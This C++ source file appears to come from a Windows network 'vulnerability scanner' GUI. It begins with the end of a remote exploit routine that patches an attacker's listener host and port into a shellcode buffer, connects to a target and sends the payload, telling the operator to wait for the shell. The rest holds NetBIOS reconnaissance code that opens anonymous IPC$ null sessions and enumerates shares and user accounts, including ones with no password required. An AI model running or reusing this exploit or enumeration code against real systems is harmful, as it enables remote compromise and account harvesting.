📄 网络评估view.cpp

📁 支持常见网络漏洞的扫描.有CVS的漏洞数据库,界面友好,使用方便.
        }

		if ((ht = gethostbyname(argv[1])) == 0){
			#ifndef WIN32
			herror(argv[1]);
			#else
			 pView->AddString( "Unable to resolve host ");
			#endif
            return 0;
        }
        
        sin.sin_port = htons(atoi(argv[2]));
        a_port = htons(atoi(argv[4]));
        a_port^=0x9595;

        sin.sin_family = AF_INET;
        sin.sin_addr = *((struct in_addr *)ht->h_addr);
        
        if ((ht = gethostbyname(argv[3])) == 0){
			#ifndef WIN32
            herror(argv[3]);
			#else
			 pView->AddString("Unable to resolve host ");
			#endif
            return 0;
        }
        
        a_host = *((unsigned long *)ht->h_addr);
        a_host^=0x95959595;

        sploit[441]= (a_port) & 0xff;
        sploit[442]= (a_port >> 8) & 0xff;

        sploit[446]=(char) ((a_host) & 0xff);
        sploit[447]= (char)((a_host >> 8) & 0xff);
        sploit[448]= (char)((a_host >> 16) & 0xff);
        sploit[449]=(char) ((a_host >> 24) & 0xff);

        if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                 pView->AddString("socket");
                return 0;
        }
        
        if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
                pView->AddString("connect");
                return 0;
        }
		else
			 pView->AddString("Connected.");
        
		if(send(s,sploit,strlen(sploit),0) == -1) {
			 pView->AddString("Error Sending Exploit.");
			return(-1);
		}
		else
	     	 pView->AddString("sent... you may need to send a carriage on your listener if the shell doesn't appear.have fun!");
       

        ::Sleep (1);
        closesocket(s);       
		return 1;
}       
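// Connect to (bEstablish != FALSE) or disconnect from (bEstablish == FALSE)
// \\Server\IPC$ with an empty user name, password and domain, i.e. an
// anonymous ("null") session.  Current Windows builds commonly refuse
// anonymous IPC$ connections, so callers should expect a NET_API_STATUS
// failure here and report it rather than treat it as a program error.
//
// Server:     computer name, with or without a leading "\\".  Must be
//             non-empty and at most CNLEN characters (slashes excluded).
// bEstablish: TRUE to add the connection (NetUseAdd), FALSE to remove it
//             (NetUseDel).
// Returns TRUE on NERR_Success; otherwise FALSE with the status available
// through GetLastError().  Both entry points are resolved at run time from
// NETAPI32.DLL; a missing module or export is reported as
// ERROR_MOD_NOT_FOUND / ERROR_PROC_NOT_FOUND instead of an unset status.
BOOL EstablishNullSession(LPCWSTR Server, BOOL bEstablish)
{
    LPCWSTR szIpc = L"\\IPC$";
    WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL
    DWORD cchServer;
    // Failure by default: the original left `nas` uninitialised when
    // GetProcAddress failed and then compared it against NERR_Success.
    NET_API_STATUS nas = ERROR_PROC_NOT_FOUND;

    //
    // do not allow NULL or empty server name
    //
    if (Server == NULL || *Server == L'\0') {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    cchServer = lstrlenW(Server);

    //
    // prepend slashes unless BOTH leading characters are already slashes.
    // The original test used &&, which treated names like "a\b" as UNC.
    //
    if (Server[0] != L'\\' || Server[1] != L'\\') {
        RemoteResource[0] = L'\\';
        RemoteResource[1] = L'\\';
        RemoteResource[2] = L'\0';
    }
    else {
        cchServer -= 2; // drop slashes from count (at least 2 chars here)
        RemoteResource[0] = L'\0';
    }

    // Keeps the two lstrcatW calls inside RemoteResource:
    // 2 + CNLEN + 5 + 1 == sizeof(RemoteResource) / sizeof(WCHAR).
    if (cchServer > CNLEN) {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    if (lstrcatW(RemoteResource, Server) == NULL) return FALSE;
    if (lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;

    //
    // NETAPI32 is loaded once for either branch and always released, even
    // when the export cannot be found (the original leaked the handle then).
    //
    HINSTANCE hNetApi = LoadLibrary("NETAPI32.DLL");
    if (hNetApi == NULL) {
        SetLastError(ERROR_MOD_NOT_FOUND);
        return FALSE;
    }

    if (bEstablish) {
        USE_INFO_2 ui2;

        ZeroMemory(&ui2, sizeof(ui2));

        ui2.ui2_local = NULL;
        ui2.ui2_remote = (LPTSTR) RemoteResource;
        ui2.ui2_asg_type = USE_IPC;
        // Empty credentials are what make this a null session.
        ui2.ui2_password = (LPTSTR) L"";
        ui2.ui2_username = (LPTSTR) L"";
        ui2.ui2_domainname = (LPTSTR) L"";

        NetUseAdd_dll = (LPFNDLLFUNC15)GetProcAddress(hNetApi, "NetUseAdd");
        if (NetUseAdd_dll != NULL)
            nas = NetUseAdd_dll(NULL, 2, (LPBYTE)&ui2, NULL);
    }
    else {
        NetUseDel_dll = (LPFNDLLFUNC16)GetProcAddress(hNetApi, "NetUseDel");
        if (NetUseDel_dll != NULL)
            nas = NetUseDel_dll(NULL, (LPTSTR) RemoteResource, 0);
    }

    // The global function pointers refer into the released module from here
    // on and must be re-resolved before any further use.
    FreeLibrary(hNetApi);

    if (nas == NERR_Success) return TRUE; // indicate success

    SetLastError(nas);

    return FALSE;
}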
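// Enumerate the shares of `computername` (NULL == local machine) with
// NetShareEnum at information level 502, print one line per share to the
// view and append a copy of each line to pView->m_stringShares.
//
// computername: server name (LPWSTR) or NULL for the local host.
// lParam:       CMyView* that owns the output list and the redraw window.
// Returns 0 on success, 3 when NetShareEnum failed (the caller then falls
// back to diskenum_95(), which uses the level-1 call).
//
// Fixes relative to the original: `res`/`BufPtr` are initialised so a
// missing export is reported instead of an unset value being tested;
// NETAPI32 is loaded once instead of once per call; the redundant first
// enumeration (whose result was freed unread) is gone; ERROR_MORE_DATA now
// continues the loop instead of returning after the first page; the share
// fields, which come from the remote host, are formatted with a bounded
// write into the 300-byte buffers; the column labels now match the values
// (the original printed the share name as "Local Path" and the path as
// "Uses"); and the error line reports the NetShareEnum status, which the
// Net* APIs return directly rather than through GetLastError().
int diskenum(LPWSTR computername, LPVOID lParam)
{
    CMyView* pView = (CMyView*)lParam;
    HWND hwnd = pView->GetSafeHwnd();
    pView->AddString("列举netbios共享(尝试winnt/2000系统)...要等待一段时间...");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);
    UCHAR temp[300], temp1[300];

    PSHARE_INFO_502 BufPtr = NULL, p;
    // Failure code by default; only a real NetShareEnum call overwrites it.
    NET_API_STATUS res = ERROR_PROC_NOT_FOUND;
    DWORD i;
    DWORD entriesread = 0, resume_handle = 0, totalentries = 0;
    int rc = 0;
    BOOL headerShown = FALSE;

    pView->AddString("NetBIOS Share Results----------------");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);
    if (computername == NULL)
        pView->AddString("解析。。。。Shares:    Local Path:    Uses:     Descriptor: ");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);

    // Resolve both exports once.  The globals are cleared first so a stale
    // pointer left by an earlier call can never be used if LoadLibrary fails.
    NetShareEnum_dll = NULL;
    NetApiBufferFree_dll = NULL;
    HINSTANCE hNetApi = LoadLibrary("NETAPI32.DLL");
    if (hNetApi != NULL) {
        NetShareEnum_dll = (LPFNDLLFUNC4)GetProcAddress(hNetApi, "NetShareEnum");
        NetApiBufferFree_dll = (LPFNDLLFUNC5)GetProcAddress(hNetApi, "NetApiBufferFree");
    }

    do {
        if (NetShareEnum_dll != NULL) {
            res = NetShareEnum_dll((LPWSTR)computername,
                                   502,
                                   (LPBYTE*)&BufPtr,
                                   0xFFFFFFFF, // MAX_PREFERRED_LENGTH: API sizes the buffer
                                   &entriesread,
                                   &totalentries,
                                   &resume_handle);
        }

        if (res != ERROR_SUCCESS && res != ERROR_MORE_DATA) {
            snprintf((char*)temp, sizeof(temp), "Share Enumeration Error (%d)", (int)res);
            temp[sizeof(temp) - 1] = 0;
            pView->AddString(temp);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            rc = 3;      // Return 3 on error so we can run diskenum95()
            break;
        }

        if (!headerShown) {
            pView->AddString("Shares:     Local Path:      Uses:     Descriptor:");
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            headerShown = TRUE;
        }

        p = BufPtr;
        for (i = 0; i < entriesread; i++, p++) {
            // netname/path/remark are supplied by the remote host; a bounded
            // write (snprintf; older MSVC spells it _snprintf) plus explicit
            // termination keeps them inside the 300-byte buffers.
            snprintf((char*)temp, sizeof(temp),
                     "Shares:%S\\%S Local Path:%S Uses:%u Descriptor:%S",
                     computername, p->shi502_netname, p->shi502_path,
                     (unsigned)p->shi502_current_uses, p->shi502_remark);
            temp[sizeof(temp) - 1] = 0;
            pView->AddString(temp);
            snprintf((char*)temp1, sizeof(temp1),
                     "Shares:%S\\%S      Local Path:%S      Uses:%u      Descriptor:%S",
                     computername, p->shi502_netname, p->shi502_path,
                     (unsigned)p->shi502_current_uses, p->shi502_remark);
            temp1[sizeof(temp1) - 1] = 0;
            pView->m_stringShares.AddTail(temp1);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            if (IsValidSecurityDescriptor(p->shi502_security_descriptor))
                pView->AddString("p->shi502_security_descriptor=YES");
            else
                pView->AddString("p->shi502_security_descriptor=NO");
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
        }

        // Release the API-allocated page before requesting the next one.
        if (BufPtr != NULL && NetApiBufferFree_dll != NULL)
            NetApiBufferFree_dll(BufPtr);
        BufPtr = NULL;
        // entriesread == 0 with ERROR_MORE_DATA would never advance; stop then.
    } while (res == ERROR_MORE_DATA && entriesread > 0);

    if (hNetApi != NULL)
        FreeLibrary(hNetApi);
    // NetShareEnum_dll / NetApiBufferFree_dll point into the released module
    // from here on and must be re-resolved before any further use.
    return rc;
}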

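// Enumerate the shares of `computername` (NULL == local machine) with
// NetShareEnum at information level 1 — the variant accepted by Win95/98
// hosts — print one line per share and append a copy of each line to
// pView->m_stringShares.
//
// computername: server name (LPWSTR) or NULL for the local host.
// lParam:       CMyView* that owns the output list and the redraw window.
// Returns 0 on success, -1 when NetShareEnum failed.
//
// Fixes relative to the original: `res`/`BufPtr` are initialised so a
// missing export is reported instead of an unset value being tested;
// NETAPI32 is loaded once instead of once per loop iteration; the share
// fields, which come from the remote host, are formatted with a bounded
// write into the 300-byte buffers; and the error line reports the
// NetShareEnum status, which the Net* APIs return directly rather than
// through GetLastError().
int diskenum_95(LPWSTR computername, LPVOID lParam)
{
    CMyView* pView = (CMyView*)lParam;
    HWND hwnd = pView->GetSafeHwnd();
    pView->AddString("列举netbios共享(尝试win95/98)...要等待一段时间...");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);
    UCHAR temp[300], temp1[300];

    PSHARE_INFO_1 BufPtr = NULL, p;
    // Failure code by default; only a real NetShareEnum call overwrites it.
    NET_API_STATUS res = ERROR_PROC_NOT_FOUND;
    DWORD i = 0;
    DWORD entriesread = 0, resume_handle = 0, totalentries = 0;
    int rc = 0;
    if (computername == NULL)
        pView->AddString("解析。。。。Shares:      Type:     Comment:");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);

    // Resolve both exports once; globals cleared first so a stale pointer
    // from an earlier call is never reused when LoadLibrary fails.
    NetShareEnum_dll = NULL;
    NetApiBufferFree_dll1 = NULL;
    HINSTANCE hNetApi = LoadLibrary("NETAPI32.DLL");
    if (hNetApi != NULL) {
        NetShareEnum_dll = (LPFNDLLFUNC4)GetProcAddress(hNetApi, "NetShareEnum");
        NetApiBufferFree_dll1 = (LPFNDLLFUNC6)GetProcAddress(hNetApi, "NetApiBufferFree");
    }

    do {
        if (NetShareEnum_dll != NULL) {
            res = NetShareEnum_dll((LPWSTR)computername,
                                   1,
                                   (LPBYTE*)&BufPtr,
                                   0xFFFFFFFF, // MAX_PREFERRED_LENGTH: API sizes the buffer
                                   &entriesread,
                                   &totalentries,
                                   &resume_handle);
        }

        if (res != ERROR_SUCCESS && res != ERROR_MORE_DATA) {
            snprintf((char*)temp, sizeof(temp), "Share Enumeration Error (%d)", (int)res);
            temp[sizeof(temp) - 1] = 0;
            pView->AddString(temp);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            rc = -1;
            break;
        }

        p = BufPtr;
        for (i = 0; i < entriesread; i++, p++) {
            // netname/remark are supplied by the remote host; bounded write
            // (snprintf; older MSVC spells it _snprintf) plus explicit
            // termination keeps them inside the 300-byte buffers.
            snprintf((char*)temp, sizeof(temp),
                     "Shares:%S\\%S netname:%S Type:%u Comment:%S",
                     computername, p->shi1_netname, p->shi1_netname,
                     (unsigned)p->shi1_type, p->shi1_remark);
            temp[sizeof(temp) - 1] = 0;
            pView->AddString(temp);
            snprintf((char*)temp1, sizeof(temp1),
                     "Shares:%S\\%S      netname:%S     Type:%u      Comment:%S",
                     computername, p->shi1_netname, p->shi1_netname,
                     (unsigned)p->shi1_type, p->shi1_remark);
            temp1[sizeof(temp1) - 1] = 0;
            pView->m_stringShares.AddTail(temp1);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
        }

        // Release the API-allocated page before requesting the next one.
        if (BufPtr != NULL && NetApiBufferFree_dll1 != NULL)
            NetApiBufferFree_dll1(BufPtr);
        BufPtr = NULL;
        // entriesread == 0 with ERROR_MORE_DATA would never advance; stop then.
    } while (res == ERROR_MORE_DATA && entriesread > 0);

    if (hNetApi != NULL)
        FreeLibrary(hNetApi);
    // NetShareEnum_dll / NetApiBufferFree_dll1 point into the released module
    // from here on and must be re-resolved before any further use.
    return rc;
}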
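// Enumerate the user accounts of `szServer` with NetQueryDisplayInformation
// (level 1), print one line per account plus a line for each account flag
// that is set, and append each user name to pView->m_stringUsers.
//
// szServer: server name (LPWSTR) or NULL for the local host.
// lParam:   CMyView* that owns the output lists and the redraw window.
// Returns 0 on success, -1 when the query failed.
//
// Fixes relative to the original: `res`/`dwRec`/`pBuff` are initialised so
// a missing export is reported instead of an unset value being tested;
// NETAPI32 is loaded once instead of once per loop iteration; ERROR_MORE_DATA
// now continues the loop from usri1_next_index (the original set `i` and
// then returned after the first page); the name/comment/full-name fields,
// which come from the remote host, are formatted with a bounded write into
// the fixed buffers (a full-length user name alone could overrun temp1);
// and the function returns on every path instead of falling off the end.
int queryuser(LPWSTR szServer, LPVOID lParam)
{
    CMyView* pView = (CMyView*)lParam;
    HWND hwnd = pView->GetSafeHwnd();
    pView->AddString("列举用户名...要等待一段时间...");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);
    UCHAR temp[300];
    UCHAR temp1[256];
    PNET_DISPLAY_USER pBuff = NULL, p;
    // Failure code by default; only a real NetQueryDisplayInformation call
    // overwrites it.  `i` is the resume index passed to the API.
    DWORD res = ERROR_PROC_NOT_FOUND, dwRec = 0, n, i = 0;
    int rc = 0;
    BOOL headerShown = FALSE;

    // Resolve both exports once; globals cleared first so a stale pointer
    // from an earlier call is never reused when LoadLibrary fails.
    NetQueryDisplayInformation_dll = NULL;
    NetApiBufferFree_dll2 = NULL;
    HINSTANCE hNetApi = LoadLibrary("NETAPI32.DLL");
    if (hNetApi != NULL) {
        NetQueryDisplayInformation_dll = (LPFNDLLFUNC3)GetProcAddress(hNetApi, "NetQueryDisplayInformation");
        NetApiBufferFree_dll2 = (LPFNDLLFUNC7)GetProcAddress(hNetApi, "NetApiBufferFree");
    }

    do {
        if (NetQueryDisplayInformation_dll != NULL) {
            res = NetQueryDisplayInformation_dll(szServer, 1, i, 10000,
                                                 10000 * sizeof(NET_DISPLAY_USER),
                                                 &dwRec, (PVOID*)&pBuff);
        }

        if ((res != ERROR_SUCCESS) && (res != ERROR_MORE_DATA)) {
            snprintf((char*)temp, sizeof(temp), "User Enumeration Error:(%u)  ", (unsigned)res);
            temp[sizeof(temp) - 1] = 0;
            pView->AddString(temp);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            rc = -1;
            break;
        }

        if (!headerShown) {
            pView->AddString("User Query Results------------------------------");
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            headerShown = TRUE;
        }

        // `n` counts down the page so `dwRec` survives for the loop condition.
        for (p = pBuff, n = dwRec; n > 0; n--, p++) {
            // Bounded write (snprintf; older MSVC spells it _snprintf) plus
            // explicit termination: these strings come from the remote host.
            snprintf((char*)temp, sizeof(temp), "Name:%S Comment:%S Full Name:%S User ID:%u",
                     p->usri1_name,
                     p->usri1_comment,
                     p->usri1_full_name,
                     (unsigned)p->usri1_user_id);
            temp[sizeof(temp) - 1] = 0;
            snprintf((char*)temp1, sizeof(temp1), "%S", p->usri1_name);
            temp1[sizeof(temp1) - 1] = 0;
            pView->m_stringUsers.AddTail(temp1);

            pView->AddString(temp);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            if (p->usri1_flags & UF_SCRIPT)
                pView->AddString("The logon script executed. This value must be set for LAN Manager 2.0 or Windows NT.");
            if (p->usri1_flags & UF_ACCOUNTDISABLE)
                pView->AddString("The user's account is disabled.");
            if (p->usri1_flags & UF_HOMEDIR_REQUIRED)
                pView->AddString("The home directory is required. Windows NT ignores this value.");
            if (p->usri1_flags & UF_PASSWD_NOTREQD)
                pView->AddString(" No password is required");
            if (p->usri1_flags & UF_PASSWD_CANT_CHANGE )
                pView->AddString("The user cannot change the password.");
            if (p->usri1_flags & UF_LOCKOUT)
                pView->AddString("The Account is Locked");
            if (p->usri1_flags & UF_DONT_EXPIRE_PASSWD)
                pView->AddString("Password does not expire");
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            i = p->usri1_next_index;  // if there is more then set the index
        }

        // Release the API-allocated page before requesting the next one.
        if (pBuff != NULL && NetApiBufferFree_dll2 != NULL)
            NetApiBufferFree_dll2(pBuff);
        pBuff = NULL;
        // dwRec == 0 with ERROR_MORE_DATA would never advance `i`; stop then.
    } while (res == ERROR_MORE_DATA && dwRec > 0);

    if (hNetApi != NULL)
        FreeLibrary(hNetApi);
    // NetQueryDisplayInformation_dll / NetApiBufferFree_dll2 point into the
    // released module from here on and must be re-resolved before further use.
    return rc;
}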
